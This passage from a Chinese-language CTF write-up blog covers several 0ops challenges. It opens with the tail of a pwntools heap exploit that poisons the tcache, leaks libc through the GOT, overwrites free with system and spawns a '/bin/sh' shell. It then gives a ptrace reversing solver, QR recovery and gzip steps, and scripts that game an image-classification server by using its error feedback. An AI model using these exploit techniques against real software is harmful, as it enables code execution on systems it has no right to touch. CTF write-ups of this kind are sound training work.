class="string">b'4112'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.sendline(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">puts</span>(<span class="params">index</span>):</span><br><span class="line">    p.sendline(<span class="string">b'57005'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    <span class="keyword">return</span> p.recvline().strip()</span><br><span class="line"></span><br><span class="line">free_got = binary.got[<span class="string">'free'</span>]</span><br><span class="line">heap_manager = <span class="number">0x4060B0</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># we will use this to get libc leak and control free_got</span></span><br><span class="line">malloc(<span class="number">0</span>,<span class="number">0x500</span>, <span class="string">b'a'</span>)</span><br><span class="line">malloc(<span class="number">1</span>,<span class="number">0x20</span>,<span class="string">b'/bin/sh\x00'</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2 is used to get control of tcache</span></span><br><span class="line">malloc(<span class="number">2</span>,<span class="number">0x90</span>, <span class="string">b'b'</span>)</span><br><span class="line"><span class="comment"># 3 is used to make a tcache bin</span></span><br><span class="line">malloc(<span class="number">3</span>,<span class="number">0x330</span>, <span class="string">b'c'</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">edit(<span class="number">2</span>,p64(heap_manager)*(<span class="number">0x90</span>//<span class="number">8</span>))</span><br><span class="line"><span class="comment"># now tcace bin is</span></span><br><span class="line"><span class="comment"># 0x340 [  1]: 0x4060b0 ◂— 0x0</span></span><br><span class="line"><span class="comment"># 0x350 [  0]: 0x4060b0 ◂— ...</span></span><br><span class="line">payload=p64(<span class="number">0x1000</span>)+p32(free_got)</span><br><span class="line"><span class="comment"># now we control the heap_manager</span></span><br><span class="line"><span class="comment"># we make index 0 's size 0x1000</span></span><br><span class="line"><span class="comment"># and we make index 1 's pointer to free_got</span></span><br><span class="line">malloc(<span class="number">3</span>,<span class="number">0x330</span>,payload)</span><br><span class="line"><span class="comment"># this will puts what is on the free_got</span></span><br><span class="line">response = puts(<span class="number">0</span>)</span><br><span class="line">libc_leak = response[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>)</span><br><span class="line">libc.address = u64(libc_leak) - libc.sym[<span class="string">'free'</span>]</span><br><span class="line">info(<span class="string">f'[LEAK&amp;CALC]: libc_base: <span class="subst">{<span class="built_in">hex</span>(libc.address)}</span>'</span>)</span><br><span class="line">system = libc.sym[<span class="string">'system'</span>]</span><br><span class="line"><span class="comment"># we overwrite free_got with system</span></span><br><span class="line">edit_0_end(<span class="number">0</span>,p64(system))</span><br><span class="line"><span class="comment"># 1's pointer point to /bin/sh</span></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></tbody></table></figure>

<p>flag:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">0ops{learning_deflat_trick_to_defeat_ollvm}</span><br></pre></td></tr></tbody></table></figure>

<h2 id="REVERSE"><a href="#REVERSE" class="headerlink" title="REVERSE"></a>REVERSE</h2><h3 id="Peer-Trace"><a href="#Peer-Trace" class="headerlink" title="Peer-Trace"></a>Peer-Trace</h3><p>这道题的考察点是ptrace和strace的用法。</p>
<p>peer程序会调用puppet程序，并使用ptrace来在不同运行时刻监视peer程序并修改其内存/寄存器的值。</p>
<p>先从<a href="https://www.jianshu.com/p/b1f9d6911c90">网上</a>学习了下ptrace的用法，主要关注<code>PTRACE_POKEDATA</code>, <code>PTRACE_SETREGS</code>因为这两个会修改被监视子程序的内存/寄存器。</p>
<p>puppet程序的逻辑是读取一个输入，长度需要为48字节，然后逐字节与0x28异或，最后与ct区域的48字节做比较。</p>
<p>建议使用<code>strace</code>观察程序运行过程中<code>ptrace</code>相关内容：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">strace ./peer</span><br></pre></td></tr></tbody></table></figure>

<p>peer程序的主要逻辑可以通过观察<code>PTRACE_POKEDATA</code>, <code>PTRACE_SETREGS</code>和相应的ida伪代码得到：</p>
<ol>
<li><p>对输入的48字节做下面的逻辑：</p>
<ul>
<li>分为8组，对每组：</li>
<li>交换0，5</li>
<li>交换1，7</li>
<li>交换2，6</li>
<li>*((_BYTE *)v25 + j) -= j + i，其中j是组内索引，i是组号，v25是每组的起始地址</li>
<li>交换3，4</li>
</ul>
</li>
<li><p>在异或0x28后，劫持程序，对每个字节做如下修改：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line">v25[<span class="number">0</span>] = <span class="number">0xA39C3E6994313F40</span>LL;</span><br><span class="line">v25[<span class="number">1</span>] = <span class="number">0x17872470565B9B60</span>LL;</span><br><span class="line">v25[<span class="number">2</span>] = <span class="number">0x11A918AABA97CA68</span>LL;</span><br><span class="line">v25[<span class="number">3</span>] = <span class="number">0xB8F1B0AB9B3DD3B0</span>LL;</span><br><span class="line">v25[<span class="number">4</span>] = <span class="number">0x488749FB6A1835E4</span>LL;</span><br><span class="line">v25[<span class="number">5</span>] = <span class="number">0x82926F78FE98158</span>LL;</span><br></pre></td></tr></tbody></table></figure>

<p>每个字节分别与peer中此时的v25中对应字节相加，舍去进位。</p>
</li>
</ol>
<p>最后再与puppet程序中ct区域的48字节作比较，需要相等。整个过程都是相对简单的可逆过程，将算法反过来即可。完整exp如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">v25 = p64(<span class="number">0xA39C3E6994313F40</span>) + p64(<span class="number">0x17872470565B9B60</span>) + p64(<span class="number">0x11A918AABA97CA68</span>) + p64(<span class="number">0xB8F1B0AB9B3DD3B0</span>) + p64(<span class="number">0x488749FB6A1835E4</span>) + p64(<span class="number">0x82926F78FE98158</span>)</span><br><span class="line">ct = p64(<span class="number">0xe3de41c1f389569c</span>) + p64(<span class="number">0x3500a2b1a46c9bd1</span>) + p64(<span class="number">0x890a29f3d010d481</span>) + p64(<span class="number">0x200f1fca08a04513</span>) + p64(<span class="number">0xc3ab5b0381564f00</span>) + p64(<span class="number">0x08953b09bbf7fdc7</span>)</span><br><span class="line"><span class="comment"># tmp1 is the bytearray after xored</span></span><br><span class="line">tmp1 = <span class="built_in">bytearray</span>()</span><br><span class="line"><span class="comment"># each byte in tmp is the result of ct[i] - v25[i]</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>):</span><br><span class="line">    <span class="keyword">if</span> ct[i] &lt; v25[i]:</span><br><span class="line">        tmp1.append(ct[i] + <span class="number">256</span> - v25[i])</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        tmp1.append(ct[i] - v25[i])</span><br><span class="line"><span class="comment"># tmp1 is the bytearray before xored with 0x28</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>):</span><br><span class="line">    tmp1[i] ^= <span class="number">0x28</span></span><br><span class="line"><span class="built_in">print</span>(tmp1)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">reverse</span>(<span class="params">cypher</span>):</span><br><span class="line">    <span class="comment"># group cypher into 8 bytes</span></span><br><span class="line">    cypher = [cypher[i:i+<span class="number">8</span>] <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(cypher), <span class="number">8</span>)]</span><br><span class="line">    <span class="comment"># for each group, we decrypt it</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(cypher)):</span><br><span class="line">        <span class="comment"># swap BYTE3 and BYTE4</span></span><br><span class="line">        tmp = cypher[i][<span class="number">3</span>]</span><br><span class="line">        cypher[i][<span class="number">3</span>] = cypher[i][<span class="number">4</span>]</span><br><span class="line">        cypher[i][<span class="number">4</span>] = tmp</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">            cypher[i][j] += j + i*<span class="number">8</span></span><br><span class="line">        <span class="comment"># swap BYTE2 and BYTE6</span></span><br><span class="line">        tmp = cypher[i][<span class="number">2</span>]</span><br><span class="line">        cypher[i][<span class="number">2</span>] = cypher[i][<span class="number">6</span>]</span><br><span class="line">        cypher[i][<span class="number">6</span>] = tmp</span><br><span class="line">        <span class="comment"># swap BYTE1 and BYTE7</span></span><br><span class="line">        tmp = cypher[i][<span class="number">1</span>]</span><br><span class="line">        cypher[i][<span class="number">1</span>] = cypher[i][<span class="number">7</span>]</span><br><span class="line">        cypher[i][<span class="number">7</span>] = tmp</span><br><span class="line">        <span class="comment"># swap BYTE0 and BYTE5</span></span><br><span class="line">        tmp = cypher[i][<span class="number">0</span>]</span><br><span class="line">        cypher[i][<span class="number">0</span>] = cypher[i][<span class="number">5</span>]</span><br><span class="line">        cypher[i][<span class="number">5</span>] = tmp</span><br><span class="line"></span><br><span class="line">    <span class="comment"># get the result</span></span><br><span class="line">    result = <span class="string">b''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(cypher)):</span><br><span class="line">        result += <span class="built_in">bytes</span>(cypher[i])</span><br><span class="line">    <span class="built_in">print</span>(result)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">reverse(tmp1)</span><br></pre></td></tr></tbody></table></figure>

<p>flag:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">0ops{tr@cE_traC1Ng_tRAc3d_TRaces_z2CcT8SjWre0oP}</span><br></pre></td></tr></tbody></table></figure>

<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="QrCode2"><a href="#QrCode2" class="headerlink" title="QrCode2"></a>QrCode2</h3><p>本题考查的是二维码的结构和标准<del>qrazybox的使用</del>。</p>
<p>之前在做hackergame还是geekgame的时候碰到一道华维码，是华容道和二维码还原的结合。题目没做出来，但是在群里看到个二维码仙人，整天在群里发他还原二维码的过程。这下真用上了，快说谢谢二维码仙人。</p>
<p>贴一个<a href="https://www.bilibili.com/video/BV1Au4m1g7vT">二维码仙人的二维码教程</a></p>
<p>要用到的工具是<a href="https://merri.cx/qrazybox/">qrazybox</a></p>
<p>由于定位块缺失，我先直接根据图片把已知的黑色白色都填充上，然后一个一个试纠错等级，发现只有M0是符合的，然后用qrazybox的tools把padding bits补上：</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b49dd8ec19.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b49dd8ec19.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="复原"></p>
<p>但是缺失的内容实在太多了，无论是直接提取还是用Reed-Solomon Decoder都得不到flag，但是通过Data Sequence Analysis可以看到message data有一个<code>}</code>，而题目已经告诉我们这题的flag格式为flag{.*}，根据二维码格式，我们将前5位message data修改位<code>flag{</code>，这时候再用Reed-Solomon Decoder已经可以得到flag了。</p>
<p>修改数据后的结果：</p>
<p><img src="https://bu.dusays.com/2024/04/26/662b49f0e4f27.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/04/26/662b49f0e4f27.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="final"></p>
<p>flag:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{D4+4_2e(0\/3R_v_!5_S0_3a5_v}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="WhereIsMyFlag"><a href="#WhereIsMyFlag" class="headerlink" title="WhereIsMyFlag"></a>WhereIsMyFlag</h3><p>本题考察的是<del>视力</del>和对数据的处理能力。</p>
<p>在github的commit记录最后可以看到：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> gzip; <span class="keyword">import</span> base64; gzip.decompress(base64.b64decode(<span class="string">'H4sIAAAAAAACA5Pv5mAAASbmt3cNuf9EzT3+sN5nQrdr2jIOrcbXJmHROjnJAouEuzN5jcq4Fbf6bN1wVlfNYInA9KvHri/k2HjhUVbxzHOHlB5vNdhWdDOpzPyo0Yy7S+6LFzyoXBVc/0r/+ffe+TVfEr8u/dF93/3if9td8//+Ff//8WK4HQMUNL7+V9J/3fBA+2Ojea/lmaCiC7PLMzf1Mt3zjTvJCBU6+Pp00v6/Ah92xQpbQoUUKm7azN2meyBZkk/cFi52vlpmbXQD0LhshLq3er7XdB2+533y4oOKccTFi/1+63HgdZnvE6hQw4PUzyW3tjH0p1rEfIGL2b4v3JLH2He6Yt1TuNjW3SaR2xnu7j6pjbCiNvLNdmXG9bdNJzJDxZqmn72ceZvJZtrDgotwse97jl/cxWqh93jnNLjY9XeXUu4ylbxXW49wytfUjff7WPbkXXdBuNjMf3ku94eItsOu/DCxe5/l3F+LPdjR8zwKoW639+RS7gt7Z++ZhLBi+tE6a6HRwBsNvNHAGw280cAbDbzRwBsNPETgff/8c/3l6bfX1355+POl/P+f7P/n1n17/L7239/8ufs8Ztf/fWr+mP/P/rrvL+vrbP59m1/39Wf/vh/T///y/vb102R/u9/b4///3m4v9+/D9vof7+bv/zX7v2bdr375Xe//6DOe7GOObudnAAAdRZxfbAoAAA=='</span>))</span><br></pre></td></tr></tbody></table></figure>

<p>运行这段代码发现处理后的数据还是<code>1f8b</code>开头，推断仍然是gzip。直接写到文件里去：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> gzip</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">x = gzip.decompress(base64.b64decode(<span class="string">'H4sIAAAAAAACA5Pv5mAAASbmt3cNuf9EzT3+sN5nQrdr2jIOrcbXJmHROjnJAouEuzN5jcq4Fbf6bN1wVlfNYInA9KvHri/k2HjhUVbxzHOHlB5vNdhWdDOpzPyo0Yy7S+6LFzyoXBVc/0r/+ffe+TVfEr8u/dF93/3if9td8//+Ff//8WK4HQMUNL7+V9J/3fBA+2Ojea/lmaCiC7PLMzf1Mt3zjTvJCBU6+Pp00v6/Ah92xQpbQoUUKm7azN2meyBZkk/cFi52vlpmbXQD0LhshLq3er7XdB2+533y4oOKccTFi/1+63HgdZnvE6hQw4PUzyW3tjH0p1rEfIGL2b4v3JLH2He6Yt1TuNjW3SaR2xnu7j6pjbCiNvLNdmXG9bdNJzJDxZqmn72ceZvJZtrDgotwse97jl/cxWqh93jnNLjY9XeXUu4ylbxXW49wytfUjff7WPbkXXdBuNjMf3ku94eItsOu/DCxe5/l3F+LPdjR8zwKoW639+RS7gt7Z++ZhLBi+tE6a6HRwBsNvNHAGw280cAbDbzRwBsNPETgff/8c/3l6bfX1355+POl/P+f7P/n1n17/L7239/8ufs8Ztf/fWr+mP/P/rrvL+vrbP59m1/39Wf/vh/T///y/vb102R/u9/b4///3m4v9+/D9vof7+bv/zX7v2bdr375Xe//6DOe7GOObudnAAAdRZxfbAoAAA=='</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">"out.gz"</span>, <span class="string">"wb+"</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(x)</span><br></pre></td></tr></tbody></table></figure>

<p>然后再终端反复解压缩，得到二进制文件后strings一下：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">gzip -d out.gz</span><br><span class="line"><span class="built_in">mv</span> out out.gz</span><br><span class="line">gzip -d out.gz</span><br><span class="line">strings ./out</span><br></pre></td></tr></tbody></table></figure>

<p>就可以得到flag:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{760671da3ca23cae060262190c01e575873c72e6}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="RealOrNot"><a href="#RealOrNot" class="headerlink" title="RealOrNot"></a>RealOrNot</h3><p>本题考查的是写脚本的能力，大概。</p>
<p>pow challenge 应该是区块链中的概念？但是和这道题关系不大，这题的pow challenge直接让AI就能写，要花太长时间的challenge就跳过好了。</p>
<p>给的server.py并不会输出第几张图片判断错了，但是实际交互时显示了。而且在我把所有图片都无重复地保存下来后发现总共只有100张图片，服务器会每次选20张让我们判断真伪，因此我们可以先将所有图片都随便打上标签，然后根据标签去向服务器发送答案，服务器每次都会给我们纠错一张，我们根据错误信息修改对应图片的标签，很快就能将所有图片的标签都修改正确。这时无论服务器选哪20张我们都能给出正确的答案。</p>
<p>保存图片的脚本：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">verify_pow_solution</span>(<span class="params">challenge, solution</span>):</span><br><span class="line">    prefix = <span class="string">"0000"</span></span><br><span class="line">    guess = solution + challenge</span><br><span class="line">    guess_hash = hashlib.sha256(guess.encode()).hexdigest()</span><br><span class="line">    <span class="keyword">return</span> guess_hash.startswith(prefix)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">solve_pow</span>(<span class="params">challenge, difficulty=<span class="number">4</span>, timeout=<span class="number">0.5</span></span>):</span><br><span class="line">    start_time = time.time()</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">for</span> solution <span class="keyword">in</span> (<span class="string">f"<span class="subst">{i:<span class="number">0</span>{difficulty}</span>x}"</span> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span> ** difficulty)):</span><br><span class="line">            <span class="keyword">if</span> verify_pow_solution(challenge, solution):</span><br><span class="line">                <span class="keyword">return</span> solution</span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt;= timeout:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">            </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">save_image</span>():</span><br><span class="line">    count = <span class="number">0</span>   </span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">20</span>):</span><br><span class="line">        p.recvuntil(<span class="string">b'Is this picture real or not (Y/N)? \n'</span>)</span><br><span class="line">        b64_image = p.recvuntil(<span class="string">b'\n'</span>, drop=<span class="literal">True</span>)</span><br><span class="line">        <span class="comment"># compared with the local images using b64, if the image is not in the local images, save it</span></span><br><span class="line">        <span class="comment"># using a uuid as the filename</span></span><br><span class="line">        <span class="comment"># if folder is empty, save the image directly</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> os.listdir(<span class="string">'images'</span>):</span><br><span class="line">            <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">f'images/<span class="subst">{uuid.uuid4()}</span>.png'</span>, <span class="string">'wb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">                f.write(base64.b64decode(b64_image))</span><br><span class="line">                count += <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            save_flag = <span class="literal">True</span></span><br><span class="line">            <span class="keyword">for</span> filename <span class="keyword">in</span> os.listdir(<span class="string">'images'</span>):</span><br><span class="line">                <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">f'images/<span class="subst">{filename}</span>'</span>, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">                    <span class="keyword">if</span> base64.b64encode(f.read()).decode() == b64_image.decode():</span><br><span class="line">                        save_flag = <span class="literal">False</span></span><br><span class="line">                        <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">if</span> save_flag:</span><br><span class="line">                <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">f'images/<span class="subst">{uuid.uuid4()}</span>.png'</span>, <span class="string">'wb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">                    f.write(base64.b64decode(b64_image))</span><br><span class="line">                    count += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">    info(<span class="string">f"save <span class="subst">{count}</span> images"</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'instance.penguin.0ops.sjtu.cn'</span>, <span class="number">18081</span>)</span><br><span class="line">p.send(<span class="string">b'CONNECT w44bxg7cgh48frjc:1 HTTP/1.1\r\n\r\n'</span>)</span><br><span class="line">p.recvuntil(<span class="string">b"solution + '"</span>)</span><br><span class="line">challenge = p.recvuntil(<span class="string">b"'"</span>, drop=<span class="literal">True</span>).decode()</span><br><span class="line">info(<span class="string">f"challenge: <span class="subst">{challenge}</span>"</span>)</span><br><span class="line"><span class="comment"># p.interactive()</span></span><br><span class="line">solution = solve_pow(challenge)</span><br><span class="line">info(<span class="string">f"solution: <span class="subst">{solution}</span>"</span>)</span><br><span class="line">p.sendline(solution.encode())</span><br><span class="line">save_image()</span><br><span class="line">p.close()</span><br></pre></td></tr></tbody></table></figure>

<p>这道题的标签我一开始是用模型打的，但是准确率并不高。exp如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'info'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">verify_pow_solution</span>(<span class="params">challenge, solution</span>):</span><br><span class="line">    prefix = <span class="string">"0000"</span></span><br><span class="line">    guess = solution + challenge</span><br><span class="line">    guess_hash = hashlib.sha256(guess.encode()).hexdigest()</span><br><span class="line">    <span class="keyword">return</span> guess_hash.startswith(prefix)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">solve_pow</span>(<span class="params">challenge, difficulty=<span class="number">4</span>, timeout=<span class="number">0.5</span></span>):</span><br><span class="line">    start_time = time.time()</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">for</span> solution <span class="keyword">in</span> (<span class="string">f"<span class="subst">{i:<span class="number">0</span>{difficulty}</span>x}"</span> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span> ** difficulty)):</span><br><span class="line">            <span class="keyword">if</span> verify_pow_solution(challenge, solution):</span><br><span class="line">                <span class="keyword">return</span> solution</span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt;= timeout:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">            </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">eval_image</span>():</span><br><span class="line">    <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">20</span>):</span><br><span class="line">        p.recvuntil(<span class="string">b'Is this picture real or not (Y/N)? \n'</span>)</span><br><span class="line">        b64_image = p.recvuntil(<span class="string">b'\n'</span>, drop=<span class="literal">True</span>)</span><br><span class="line">        <span class="keyword">for</span> filename <span class="keyword">in</span> os.listdir(<span class="string">'images_model'</span>):</span><br><span class="line">            <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">f'images_model/<span class="subst">{filename}</span>'</span>, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">                <span class="keyword">if</span> base64.b64encode(f.read()).decode() == b64_image.decode():</span><br><span class="line">                    correct_answer = filename[-<span class="number">5</span>].upper()</span><br><span class="line">                    file_list.append(filename)</span><br><span class="line">                    <span class="keyword">if</span> correct_answer != <span class="string">'Y'</span> <span class="keyword">and</span> correct_answer != <span class="string">'N'</span>:</span><br><span class="line">                        correct_answer = <span class="string">'N'</span></span><br><span class="line">                    correct_answers.append(correct_answer)</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">    p.recvuntil(<span class="string">b" all 20 rounds (Y/N): "</span>)</span><br><span class="line">    data = <span class="string">''</span>.join(correct_answers)</span><br><span class="line">    info(data)</span><br><span class="line">    p.sendline(data.encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    correct_answers = []</span><br><span class="line">    file_list = []</span><br><span class="line">    p = remote(<span class="string">'instance.penguin.0ops.sjtu.cn'</span>, <span class="number">18081</span>)</span><br><span class="line">    p.send(<span class="string">b'CONNECT gmvfevkv2k6p982q:1 HTTP/1.1\r\n\r\n'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b"solution + '"</span>)</span><br><span class="line">    challenge = p.recvuntil(<span class="string">b"'"</span>, drop=<span class="literal">True</span>).decode()</span><br><span class="line">    info(<span class="string">f"challenge: <span class="subst">{challenge}</span>"</span>)</span><br><span class="line">    <span class="comment"># p.interactive()</span></span><br><span class="line">    solution = solve_pow(challenge)</span><br><span class="line">    <span class="keyword">if</span> solution <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    info(<span class="string">f"solution: <span class="subst">{solution}</span>"</span>)</span><br><span class="line">    p.sendline(solution.encode())</span><br><span class="line">    eval_image()</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        response = p.recvuntil(<span class="string">b"Incorrect answer for Round "</span>, timeout=<span class="number">0.3</span>)</span><br><span class="line">        wrong_round = p.recvuntil(<span class="string">b"."</span>, drop=<span class="literal">True</span>)</span><br><span class="line">        info(<span class="string">f"wrong_round: <span class="subst">{wrong_round}</span>"</span>)</span><br><span class="line">        wrong_round = <span class="built_in">int</span>(wrong_round)</span><br><span class="line">        wrong_filename = file_list[wrong_round - <span class="number">1</span>]</span><br><span class="line">        <span class="comment"># change the filename to the right answer(opposite of original answer)</span></span><br><span class="line">        <span class="comment"># modify the filename to the right answer</span></span><br><span class="line">        correct_answer = correct_answers[wrong_round - <span class="number">1</span>]</span><br><span class="line">        <span class="keyword">if</span> correct_answer == <span class="string">'Y'</span>:</span><br><span class="line">            correct_answer = <span class="string">'N'</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            correct_answer = <span class="string">'Y'</span></span><br><span class="line">        right_filename = wrong_filename[:-<span class="number">5</span>] + correct_answer + <span class="string">'.png'</span></span><br><span class="line">        <span class="comment"># append the wrong filename to log.txt</span></span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'log.txt'</span>, <span class="string">'a'</span>) <span class="keyword">as</span> f:</span><br><span class="line">            f.write(<span class="string">f'<span class="subst">{wrong_filename}</span>\n'</span>)</span><br><span class="line">        os.rename(<span class="string">f'images_model/<span class="subst">{wrong_filename}</span>'</span>, <span class="string">f'images_model/<span class="subst">{right_filename}</span>'</span>)</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></tbody></table></figure>

<p>flag:</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">flag{DeepFake_1s_Ea5y_aNd_1ntere5t1ng!}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="RealOrNotRevenge"><a href="#RealOrNotRevenge" class="headerlink" title="RealOrNotRevenge"></a>RealOrNotRevenge</h3><p>本题考察的是谷歌识图的能力。</p>
<p>下载图片和之前一样，这道题我下载下来只有86张图片。我全部拿去谷歌识图，能搜到的大多数是unsplash上的图片。能搜到的我都标记Y，搜不到的都标记N。准确率似乎极高。。。跑个几次就出flag了。因此主要工作量在于我手动谷歌识图，但是应该可以写代码调用API？</p>
<p>exp如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'info'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">verify_pow_solution</span>(<span class="params">challenge, solution</span>):</span><br><span class="line">    prefix = <span class="string">"00000"</span></span><br><span class="line">    guess = solution + challenge</span><br><span class="line">    guess_hash = hashlib.sha256(guess.encode()).hexdigest()</span><br><span class="line">    <span class="keyword">return</span> guess_hash.startswith(prefix)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">solve_pow</span>(<span class="params">challenge, difficulty=<span class="number">5</span>, timeout=<span class="number">3</span></span>):</span><br><span class="line">    start_time = time.time()</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">for</span> solution <span class="keyword">in</span> (<span class="string">f"<span class="subst">{i:<span class="number">0</span>{difficulty}</span>x}"</span> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span> ** difficulty)):</span><br><span class="line">            <span class="keyword">if</span> verify_pow_solution(challenge, solution):</span><br><span class="line">                <span class="keyword">return</span> solution</span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt;= timeout:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">            </span><br><span class="line"><span 